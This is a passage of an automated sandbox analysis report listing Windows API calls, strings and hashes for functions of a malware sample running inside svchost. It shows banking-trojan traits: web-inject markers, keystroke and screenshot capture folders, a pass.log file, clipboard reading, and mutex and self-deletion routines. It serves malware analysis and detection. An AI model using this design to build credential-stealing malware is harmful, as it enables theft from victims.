GetLastError.KERNEL32(?,75BFBF00), ref: 02D40BFB
IsUserAnAdmin.SHELL32 ref: 02D40C03
PathMakeSystemFolderA.SHLWAPI(?), ref: 02D40C14
SetLastError.KERNEL32(00000000,?,75BFBF00), ref: 02D40C1B
GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,75BFBF00), ref: 02D40C5A
GetFileAttributesA.KERNEL32(?,?,75BFBF00), ref: 02D40C67
SetCurrentDirectoryA.KERNEL32(?,?,75BFBF00), ref: 02D40CB0
VirtualAlloc.KERNEL32(00000000,00000104,00003000,00000004,?,75BFBF00), ref: 02D40CCC
lstrcpynA.KERNEL32(00000000,?,00000104,?,75BFBF00), ref: 02D40CE9

Part of subcall function 02D492D0: GetProcessHeap.KERNEL32(00000008,00004070,?,00000000,75B0A250,?,02D338A8,?), ref: 02D492E3
Part of subcall function 02D492D0: HeapAlloc.KERNEL32(00000000,?,02D338A8,?), ref: 02D492E6
Part of subcall function 02D492D0: memset.MSVCRT ref: 02D492FB
Part of subcall function 02D492D0: CreateFileA.KERNEL32(02D338A8,40000000,00000003,00000000,00000002,00000080,00000000,?,02D338A8,?), ref: 02D49352
Part of subcall function 02D492D0: GetProcessHeap.KERNEL32(00000000,00000000,?,02D338A8,?), ref: 02D49375
Part of subcall function 02D492D0: HeapValidate.KERNEL32(00000000,?,02D338A8,?), ref: 02D49378
Part of subcall function 02D492D0: GetProcessHeap.KERNEL32(00000000,00000000,?,02D338A8,?), ref: 02D49384
Part of subcall function 02D492D0: HeapFree.KERNEL32(00000000,?,02D338A8,?), ref: 02D49387

VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,75BFBF00), ref: 02D40D18
PathAddBackslashA.SHLWAPI(5E8DC3C1,?,75BFBF00), ref: 02D40D37
SetFileAttributesA.KERNEL32(?,00000000,?,75BFBF00), ref: 02D40D9B
DeleteFileA.KERNEL32(?,?,75BFBF00), ref: 02D40DA8

Part of subcall function 02D49460: LocalAlloc.KERNEL32(00000040,-00000103,00000000,00000000,75B0A250), ref: 02D494E1
Part of subcall function 02D49460: _snprintf.MSVCRT ref: 02D494FD
Part of subcall function 02D49460: FindFirstFileA.KERNEL32(00000000,?), ref: 02D4950C
Part of subcall function 02D49460: LocalFree.KERNEL32(00000000), ref: 02D49519
Part of subcall function 02D49460: wsprintfA.USER32 ref: 02D49558
Part of subcall function 02D49460: wsprintfA.USER32 ref: 02D49566

Strings

5E8DC3C1, xrefs: 02D40BAB, 02D40BB2, 02D40D32, 02D40D39
\, xrefs: 02D40C89
inter.zip, xrefs: 02D40C30
path.txt, xrefs: 02D40D78

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: FileHeap$AllocFreePathProcess$AttributesBackslashCreateDirectoryErrorLastLocalVirtualwsprintf$AdminCurrentDeleteFindFirstFolderMakeModuleNameSystemUserValidate_snprintflstrcpynmemset
String ID: 5E8DC3C1$\$inter.zip$path.txt
API String ID: 3082343898-1471523162
Opcode ID: 690bac372c4864bde2fd6941af65324238cc72596d3bf6de2ad57a507d31511f
Instruction ID: 9481e43f22e23320650ce0c1c8aa7494e634c5c77cb8dbe2ed65a21cc34d1449
Opcode Fuzzy Hash: 690bac372c4864bde2fd6941af65324238cc72596d3bf6de2ad57a507d31511f
Instruction Fuzzy Hash: 6E6126309006599FDB25CB24A8ACBEB7BE4EF45301F544594EAC9DB341EF719D88CBA0

Function 02D3B0D9 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 129sleepsynchronizationfileCOMMON

Download Yara Rule

APIs

PathAddBackslashA.SHLWAPI(5e8dc0d9,00000000,00000001), ref: 02D3B0F6
CreateDirectoryA.KERNEL32(02D7D788,00000000), ref: 02D3B131
GetLastError.KERNEL32 ref: 02D3B137
IsUserAnAdmin.SHELL32 ref: 02D3B13F
PathMakeSystemFolderA.SHLWAPI(02D7D788), ref: 02D3B14E
SetLastError.KERNEL32(00000000), ref: 02D3B155
Sleep.KERNEL32(000003E8), ref: 02D3B18B
CopyFileA.KERNEL32(00000000,02D7D788,00000000), ref: 02D3B1C3
CreateMutexA.KERNEL32(00000000,00000000,Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}), ref: 02D3B1D6
Sleep.KERNEL32(000003E8), ref: 02D3B1E7
ReleaseMutex.KERNEL32(00000000), ref: 02D3B1EA
GetHandleInformation.KERNEL32(00000000,00000000), ref: 02D3B1FC

Strings

Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}, xrefs: 02D3B1CD
5e8dc0d9, xrefs: 02D3B0F1, 02D3B0FC

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: CreateErrorLastMutexPathSleep$AdminBackslashCopyDirectoryFileFolderHandleInformationMakeReleaseSystemUser
String ID: 5e8dc0d9$Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}
API String ID: 2754757069-932628129
Opcode ID: 85c1e1921f22277fef84f47fe69f617b6991f92a73cc74177a54ed93cfaab52b
Instruction ID: ef388a7ea4e211c0980367e3bc0b901a2eab97025789eed94feb1c6846706a60
Opcode Fuzzy Hash: 85c1e1921f22277fef84f47fe69f617b6991f92a73cc74177a54ed93cfaab52b
Instruction Fuzzy Hash: DB412631A40655ABEB220B34FC6DBAB3BD6EF46749F584546E886CB380DB74CD44C7A0

Function 02D2C320 Relevance: 33.4, APIs: 18, Strings: 1, Instructions: 124windowsleepthreadCOMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 02D2C32C
GetWindow.USER32(00000000,00000005), ref: 02D2C34D
GetWindow.USER32(00000000), ref: 02D2C350
IsWindowVisible.USER32(00000000), ref: 02D2C355
IsWindowVisible.USER32(00000000), ref: 02D2C364
GetWindowThreadProcessId.USER32(00000000,?), ref: 02D2C377
GetClassNameA.USER32(00000000,?,00000101), ref: 02D2C399
GetWindowInfo.USER32(00000000,?), ref: 02D2C405
SetWindowLongA.USER32(00000000,000000EC,?), ref: 02D2C427
SetLayeredWindowAttributes.USER32(00000000,0000FFFF,000000FF,00000002), ref: 02D2C436
GetClassLongA.USER32(00000000,000000E6), ref: 02D2C43F
SetClassLongA.USER32(00000000,000000E6,00000000), ref: 02D2C452
SendMessageA.USER32(00000000,000000D2,00000000,00000000), ref: 02D2C462
SendMessageA.USER32(00000000,000000CC,00000000,00000000), ref: 02D2C476
Sleep.KERNEL32(00000000), ref: 02D2C47E
EnumChildWindows.USER32(00000000,02D2C2A0,00000000), ref: 02D2C48C
GetWindow.USER32(00000000,00000003), ref: 02D2C495
Sleep.KERNEL32(00000001), ref: 02D2C4A3

Strings

<, xrefs: 02D2C3FE

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: Window$ClassLong$MessageSendSleepVisible$AttributesChildDesktopEnumInfoLayeredNameProcessThreadWindows
String ID: <
API String ID: 2886700239-4251816714
Opcode ID: c3839df5e2feceb905a4f2b294e22a6107e41630faf90740e469cdc607d6ec25
Instruction ID: b6dddf47e1f27a672a3e8c059e74a65fb79137e6a065116d0885aad894b9c7d8
Opcode Fuzzy Hash: c3839df5e2feceb905a4f2b294e22a6107e41630faf90740e469cdc607d6ec25
Instruction Fuzzy Hash: 67411730A90624AFE7209B64EC4DFBE3728EF15B59F400A06F581E63C0D7B4AE55C674

Function 02D32100 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 104COMMON

Download Yara Rule

APIs

Part of subcall function 02D32060: memset.MSVCRT ref: 02D32082
Part of subcall function 02D32060: GetParent.USER32(?), ref: 02D3208E
Part of subcall function 02D32060: GetWindowTextW.USER32(00000000,?,00000104), ref: 02D320A5
Part of subcall function 02D32060: StrStrIW.SHLWAPI(?,00000000,?,?,?,?,00000000), ref: 02D320C6

EnterCriticalSection.KERNEL32(02D6FB38,?,?), ref: 02D32136
PathAddBackslashA.SHLWAPI(?,?,00000000), ref: 02D32164
PathAppendA.SHLWAPI(?,?), ref: 02D32178
CreateDirectoryA.KERNEL32(?,00000000), ref: 02D32189
GetLastError.KERNEL32 ref: 02D3218F
IsUserAnAdmin.SHELL32 ref: 02D32198
PathMakeSystemFolderA.SHLWAPI(?), ref: 02D321A9
SetLastError.KERNEL32(?), ref: 02D321B3
PathAppendA.SHLWAPI(?,keygrab), ref: 02D321C5
CreateDirectoryA.KERNEL32(?,00000000), ref: 02D321D0
GetLastError.KERNEL32 ref: 02D321D6
IsUserAnAdmin.SHELL32 ref: 02D321DE
PathMakeSystemFolderA.SHLWAPI(?), ref: 02D321EF
SetLastError.KERNEL32(00000000), ref: 02D321F6
PathAddBackslashA.SHLWAPI(?), ref: 02D32203
_snprintf.MSVCRT ref: 02D32233
LeaveCriticalSection.KERNEL32(02D6FB38,?), ref: 02D32253

Strings

%02u.bmp, xrefs: 02D32221
keygrab, xrefs: 02D321B9

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: Path$ErrorLast$AdminAppendBackslashCreateCriticalDirectoryFolderMakeSectionSystemUser$EnterLeaveParentTextWindow_snprintfmemset
String ID: %02u.bmp$keygrab
API String ID: 2122597915-4222822809
Opcode ID: f69e06b1cbdfd30e17a97c6eac0c0aeb1acfc0b6ac3481445d9b62cacdf46865
Instruction ID: a8d066d3e097764e446edc936e99ae9cb40562f5a52a3151a5362009682d9304
Opcode Fuzzy Hash: f69e06b1cbdfd30e17a97c6eac0c0aeb1acfc0b6ac3481445d9b62cacdf46865
Instruction Fuzzy Hash: A3318D76940219ABDB10DBB4EC4CAE977B8EF48700F548994E989D7300DBB4DDD5CBA0

Function 02D31080 Relevance: 31.8, APIs: 16, Strings: 5, Instructions: 275memorystringCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(02D6FB20,00000000,00000000,00000000,?,02D31799), ref: 02D31090
GetProcessHeap.KERNEL32(00000008,00000020,?,02D31799), ref: 02D310F8
HeapAlloc.KERNEL32(00000000,?,02D31799), ref: 02D310FF
strstr.MSVCRT ref: 02D3117F
strstr.MSVCRT ref: 02D31199
strstr.MSVCRT ref: 02D311B3
strstr.MSVCRT ref: 02D311CD
strstr.MSVCRT ref: 02D311F7
GetProcessHeap.KERNEL32(00000008,00000020), ref: 02D31214
HeapAlloc.KERNEL32(00000000), ref: 02D3121B
strstr.MSVCRT ref: 02D31344
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D3137C
HeapValidate.KERNEL32(00000000), ref: 02D3137F
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D3138C
HeapFree.KERNEL32(00000000), ref: 02D3138F
LeaveCriticalSection.KERNEL32(02D6FB20,?,02D31799), ref: 02D3139A

Strings

data_after, xrefs: 02D312DE
data_inject, xrefs: 02D3128E
data_before, xrefs: 02D311F1, 02D31244, 02D31336
data_end, xrefs: 02D31249, 02D31293, 02D312E3
set_url , xrefs: 02D31123

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$strstr$Process$AllocCriticalSection$EnterFreeLeaveValidate
String ID: data_after$data_before$data_end$data_inject$set_url
API String ID: 2387113551-2328515424
Opcode ID: ab0243a95cd279a8a96cb9282865024bf28d90c8b5e92b358c1430cb9ed0d9e1
Instruction ID: 212d1194dc23251ddf53504e98a1a77a20f0700b95433cc474bbb0e453b23f0d
Opcode Fuzzy Hash: ab0243a95cd279a8a96cb9282865024bf28d90c8b5e92b358c1430cb9ed0d9e1
Instruction Fuzzy Hash: A7A1F375A043429FDB22CF34D4987A67FE1EF45304F1885A9D88A8B345EB71DE49CB90

Function 02D483F0 Relevance: 31.7, APIs: 14, Strings: 4, Instructions: 187COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32(?,00000000,00000000), ref: 02D483F9
GetFileInformationByHandle.KERNEL32(?,?), ref: 02D48416

Strings

D0<, xrefs: 02D48505, 02D4851D, 02D4854A, 02D48508, 02D48520, 02D4854D
D0<, xrefs: 02D4858B, 02D485AD, 02D485C3, 02D485B0
,D0<, xrefs: 02D48597
,D0<, xrefs: 02D48592

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: File$HandleInformationType
String ID: ,D0<$,D0<$D0<$D0<
API String ID: 4064226416-1748840775
Opcode ID: db84ddbcb2e0b04d971398fa3e6f5a235546d0c291e291bae361133d899397fe
Instruction ID: 1d4966bff961fcc7de8ed0212733011f6eca0fd9fc72ce0ded7a622d461423bb
Opcode Fuzzy Hash: db84ddbcb2e0b04d971398fa3e6f5a235546d0c291e291bae361133d899397fe
Instruction Fuzzy Hash: 1A518071D40218ABDB14CFA4DC84FBEBBB9FB44744F54851AEA04EB280DB749D40DBA1

Function 02D32E30 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 173memorythreadclipboardCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 02D32E4D
GlobalLock.KERNEL32(00000000), ref: 02D32E6E
GetCurrentThreadId.KERNEL32 ref: 02D32E8F
GetGUIThreadInfo.USER32(00000000), ref: 02D32E96
GetOpenClipboardWindow.USER32 ref: 02D32EAC
GetActiveWindow.USER32 ref: 02D32EBA
WideCharToMultiByte.KERNEL32(?,?,00000000,000000FF,?,?,?,?), ref: 02D32EE8
GetProcessHeap.KERNEL32(00000008,00000013), ref: 02D32F0A
HeapAlloc.KERNEL32(00000000), ref: 02D32F11
memset.MSVCRT ref: 02D32F21
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000), ref: 02D32F3E
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D32F8B
HeapValidate.KERNEL32(00000000), ref: 02D32F8E
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D32F9B
HeapFree.KERNEL32(00000000), ref: 02D32F9E
GlobalUnlock.KERNEL32(00000000), ref: 02D32FA9
GlobalUnlock.KERNEL32(00000000,00000000,00000001), ref: 02D32FEF

Strings

0, xrefs: 02D32E87

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$GlobalProcess$ByteCharMultiThreadUnlockWideWindowmemset$ActiveAllocClipboardCurrentFreeInfoLockOpenValidate
String ID: 0
API String ID: 3472172748-4108050209
Opcode ID: ffab22cd4f95a8bdbf66e6913f6937ecd56c334e3a82bf24ccea778433084cba
Instruction ID: c1be43753f43aaec3bbee4ce7f046668e3af5a8ef0b0886d5be41c9adbb9764a
Opcode Fuzzy Hash: ffab22cd4f95a8bdbf66e6913f6937ecd56c334e3a82bf24ccea778433084cba
Instruction Fuzzy Hash: 1C51F171A443026BD7269B69EC8CB6B7BA9EF8A714F100618FD45D73C0DB61DD08CBA1

Function 02D2C3D9 Relevance: 31.6, APIs: 17, Strings: 1, Instructions: 113windowsleepthreadCOMMON

Download Yara Rule

APIs

GetWindow.USER32(00000000,00000005), ref: 02D2C34D
GetWindow.USER32(00000000), ref: 02D2C350
IsWindowVisible.USER32(00000000), ref: 02D2C355
IsWindowVisible.USER32(00000000), ref: 02D2C364
GetWindowThreadProcessId.USER32(00000000,?), ref: 02D2C377
GetClassNameA.USER32(00000000,?,00000101), ref: 02D2C399
GetWindowInfo.USER32(00000000,?), ref: 02D2C405
SetWindowLongA.USER32(00000000,000000EC,?), ref: 02D2C427
SetLayeredWindowAttributes.USER32(00000000,0000FFFF,000000FF,00000002), ref: 02D2C436
GetClassLongA.USER32(00000000,000000E6), ref: 02D2C43F
SetClassLongA.USER32(00000000,000000E6,00000000), ref: 02D2C452
SendMessageA.USER32(00000000,000000D2,00000000,00000000), ref: 02D2C462
SendMessageA.USER32(00000000,000000CC,00000000,00000000), ref: 02D2C476
Sleep.KERNEL32(00000000), ref: 02D2C47E
EnumChildWindows.USER32(00000000,02D2C2A0,00000000), ref: 02D2C48C
GetWindow.USER32(00000000,00000003), ref: 02D2C495
Sleep.KERNEL32(00000001), ref: 02D2C4A3

Strings

<, xrefs: 02D2C3FE

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: Window$ClassLong$MessageSendSleepVisible$AttributesChildEnumInfoLayeredNameProcessThreadWindows
String ID: <
API String ID: 1978407388-4251816714
Opcode ID: 5313b71f4fca24b5b4f8db439cefb57c21a4fa8c26cfc69e5295d0704f8d8bf2
Instruction ID: c95570a8b41989a76e62a2def19729cd7f55dfa8ec28593ccaeae20cdf0b1b50
Opcode Fuzzy Hash: 5313b71f4fca24b5b4f8db439cefb57c21a4fa8c26cfc69e5295d0704f8d8bf2
Instruction Fuzzy Hash: 3D312A30A906216FE7309B60EC4EFBF3728EF15749F500A05F682E52C0C7A4AE55C678

Function 02D401D0 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 116memoryfileCOMMON

Download Yara Rule

APIs

GetFileSizeEx.KERNEL32(?,?,00000000,00000000,75B07390,?,02D2148C,00000000,?), ref: 02D4020A
GetProcessHeap.KERNEL32(00000008,?,?,02D2148C,00000000,?), ref: 02D40229
HeapAlloc.KERNEL32(00000000,?,02D2148C,00000000,?), ref: 02D40230
memset.MSVCRT ref: 02D40248
SetFilePointer.KERNEL32 ref: 02D40263
LockFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 02D40274
ReadFile.KERNEL32(?,00000000,?,?,00000000), ref: 02D40284
UnlockFile.KERNEL32(?,?,00000000,?,00000000), ref: 02D40299
StrStrA.SHLWAPI(00000000,BEGIN SIGNATURE), ref: 02D402B2
StrStrA.SHLWAPI(00000000,END SIGNATURE), ref: 02D402BE
SetFilePointerEx.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,75B07390,?,02D2148C,00000000,?), ref: 02D402DB
GetProcessHeap.KERNEL32(00000000,00000000,?,02D2148C,00000000,?), ref: 02D402EE
HeapValidate.KERNEL32(00000000,?,02D2148C,00000000,?), ref: 02D402F1
GetProcessHeap.KERNEL32(00000000,00000000,?,02D2148C,00000000,?), ref: 02D402FE
HeapFree.KERNEL32(00000000,?,02D2148C,00000000,?), ref: 02D40301

Strings

END SIGNATURE, xrefs: 02D402B8
BEGIN SIGNATURE, xrefs: 02D402AC

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: FileHeap$Process$Pointer$AllocFreeLockReadSizeUnlockValidatememset
String ID: BEGIN SIGNATURE$END SIGNATURE
API String ID: 373673121-4158457813
Opcode ID: a6d28f69e48ef2f1e803062ed174324a28e5dcb16340db0db7c332a86ae30f37
Instruction ID: 40aadfe9bebd87b874c21b81afa3f9e794b7b21c143122bac672e1eac836691c
Opcode Fuzzy Hash: a6d28f69e48ef2f1e803062ed174324a28e5dcb16340db0db7c332a86ae30f37
Instruction Fuzzy Hash: 3531AF71945300ABE3209F64AC8DF2BBBACEF48B05F544A19FA44E6280DB70DD54CBB5

Function 02D412A0 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 111sleepCOMMON

Download Yara Rule

APIs

PathAddBackslashA.SHLWAPI(5e8dc356), ref: 02D412C7
CreateDirectoryA.KERNEL32(?,00000000), ref: 02D41315
GetLastError.KERNEL32 ref: 02D41321
IsUserAnAdmin.SHELL32 ref: 02D41325
PathMakeSystemFolderA.SHLWAPI(?), ref: 02D41336
SetLastError.KERNEL32(00000000), ref: 02D4133D
PathAddBackslashA.SHLWAPI(?), ref: 02D41370
CreateDirectoryA.KERNEL32(?,00000000), ref: 02D4137F
GetLastError.KERNEL32 ref: 02D41385
IsUserAnAdmin.SHELL32 ref: 02D41389
PathMakeSystemFolderA.SHLWAPI(?), ref: 02D4139A
SetLastError.KERNEL32(00000000), ref: 02D413A1
_snprintf.MSVCRT ref: 02D413CF
Sleep.KERNEL32(00000FA0,?), ref: 02D413E5

Strings

%s\%02d.bmp, xrefs: 02D413BE
5e8dc356, xrefs: 02D412C2, 02D412CD
scrs, xrefs: 02D41358

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: ErrorLastPath$AdminBackslashCreateDirectoryFolderMakeSystemUser$Sleep_snprintf
String ID: %s\%02d.bmp$5e8dc356$scrs
API String ID: 1455050916-628881103
Opcode ID: 54cd61a7a5f578c248c9d06060558566583b3b78f531c01dbcb05e7201c7df7e
Instruction ID: afb0054dd8cbb71c4990d1175a9c1b87b4850e31c70e00805b10c7aea919a0c7
Opcode Fuzzy Hash: 54cd61a7a5f578c248c9d06060558566583b3b78f531c01dbcb05e7201c7df7e
Instruction Fuzzy Hash: C731F3759402199FCB20DB74A89CBEA77A8AB49744F844594E9CAD7300EF70DDD4CBB0

Function 02D3C1F0 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 111sleepCOMMON

Download Yara Rule

APIs

PathAddBackslashA.SHLWAPI(5E8DC08D), ref: 02D3C217
CreateDirectoryA.KERNEL32(?,00000000), ref: 02D3C265
GetLastError.KERNEL32 ref: 02D3C271
IsUserAnAdmin.SHELL32 ref: 02D3C275
PathMakeSystemFolderA.SHLWAPI(?), ref: 02D3C286
SetLastError.KERNEL32(00000000), ref: 02D3C28D
PathAddBackslashA.SHLWAPI(?), ref: 02D3C2C0
CreateDirectoryA.KERNEL32(?,00000000), ref: 02D3C2CF
GetLastError.KERNEL32 ref: 02D3C2D5
IsUserAnAdmin.SHELL32 ref: 02D3C2D9
PathMakeSystemFolderA.SHLWAPI(?), ref: 02D3C2EA
SetLastError.KERNEL32(00000000), ref: 02D3C2F1
_snprintf.MSVCRT ref: 02D3C31F
Sleep.KERNEL32(00000FA0,?), ref: 02D3C335

Strings

5E8DC08D, xrefs: 02D3C212, 02D3C21D
%s\%02d.bmp, xrefs: 02D3C30E
scrs, xrefs: 02D3C2A8

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: ErrorLastPath$AdminBackslashCreateDirectoryFolderMakeSystemUser$Sleep_snprintf
String ID: %s\%02d.bmp$5E8DC08D$scrs
API String ID: 1455050916-1498703533
Opcode ID: acf0aeb5abaefe9d23edd10d727ca9d7b0d8ad5d72c2824fc1adc8f4b1bb4b31
Instruction ID: 70e8c070a62d79d1a702d8c05a980fd3539fdcaf1ae3832fc8c41d5ad0826bda
Opcode Fuzzy Hash: acf0aeb5abaefe9d23edd10d727ca9d7b0d8ad5d72c2824fc1adc8f4b1bb4b31
Instruction Fuzzy Hash: CD3126759402195BCB219BB4FC9CBEA77A8AB49B00F848595E986E7300DB70DD94CBB0

Function 02D41B60 Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 115synchronizationsleepfileCOMMON

Download Yara Rule

APIs

PathAddBackslashA.SHLWAPI(5e8dc4c1), ref: 02D41BA7
CreateDirectoryA.KERNEL32(?,00000000), ref: 02D41BE7
GetLastError.KERNEL32 ref: 02D41BF1
IsUserAnAdmin.SHELL32 ref: 02D41BF9
PathMakeSystemFolderA.SHLWAPI(?), ref: 02D41C0A
SetLastError.KERNEL32(00000000), ref: 02D41C11
SetFileAttributesA.KERNEL32(?,00000000), ref: 02D41C4B
DeleteFileA.KERNEL32(?), ref: 02D41C58
CreateMutexA.KERNEL32(00000000,00000000,Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214},?,?), ref: 02D41C77
Sleep.KERNEL32(000003E8), ref: 02D41C88
ReleaseMutex.KERNEL32(00000000), ref: 02D41C8F
GetHandleInformation.KERNEL32(00000000,?), ref: 02D41CA1
CloseHandle.KERNEL32(00000000), ref: 02D41CB2

Strings

5e8dc4c1, xrefs: 02D41BA2, 02D41BAD
pass.log, xrefs: 02D41C28
Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}, xrefs: 02D41C6E

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: CreateErrorFileHandleLastMutexPath$AdminAttributesBackslashCloseDeleteDirectoryFolderInformationMakeReleaseSleepSystemUser
String ID: 5e8dc4c1$Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}$pass.log
API String ID: 1707266166-187836521
Opcode ID: e14c5ad2e07ddfca530324192d99c65cf475e1d2b3ebde96c640f3fe150115a9
Instruction ID: e81604f29bf54f3ff3d28d8ddf47084f3be11fd51a33c7601df2742e06b4269f
Opcode Fuzzy Hash: e14c5ad2e07ddfca530324192d99c65cf475e1d2b3ebde96c640f3fe150115a9
Instruction Fuzzy Hash: F741C130944219ABDB119B24E85CBEABBA8EF45301F548595E88AD7340EF70DED4CB60

Function 02D41B88 Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 107synchronizationsleepfileCOMMON

Download Yara Rule

APIs

PathAddBackslashA.SHLWAPI(5e8dc4c1), ref: 02D41BA7
CreateDirectoryA.KERNEL32(?,00000000), ref: 02D41BE7
GetLastError.KERNEL32 ref: 02D41BF1
IsUserAnAdmin.SHELL32 ref: 02D41BF9
PathMakeSystemFolderA.SHLWAPI(?), ref: 02D41C0A
SetLastError.KERNEL32(00000000), ref: 02D41C11
SetFileAttributesA.KERNEL32(?,00000000), ref: 02D41C4B
DeleteFileA.KERNEL32(?), ref: 02D41C58
CreateMutexA.KERNEL32(00000000,00000000,Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214},?,?), ref: 02D41C77
Sleep.KERNEL32(000003E8), ref: 02D41C88
